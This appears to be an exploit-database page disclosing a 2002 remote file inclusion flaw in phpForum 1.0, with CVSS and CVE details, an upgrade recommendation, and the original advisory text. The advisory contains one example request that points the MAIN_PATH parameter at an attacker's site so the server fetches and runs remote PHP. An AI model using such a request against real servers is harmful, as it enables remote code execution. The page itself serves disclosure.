header-logo
Suggest Exploit
vendor:
phpForum
by:
SecurityFocus
8,8
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: phpForum
Affected Version From: phpForum 1.0
Affected Version To: phpForum 1.0
Patch Exists: YES
Related CWE: CVE-2002-1390
CPE: cpe:a:phpforum:phpforum:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

phpForum Remote File Inclusion Vulnerability

phpForum is vulnerable to a remote file inclusion vulnerability, which allows an attacker to include and execute malicious PHP scripts. This can be exploited by sending a specially crafted HTTP request to the vulnerable server, containing a malicious URL in the MAIN_PATH parameter.

Mitigation:

Upgrade to the latest version of phpForum.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8158/info

phpForum is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. This could be exploited to execute malicious PHP commands in the context of the web server process.

http://www.example.com/forum/mainfile.php?MAIN_PATH=[attacker's site]

Navigation

Suggest Exploit

Services By CQR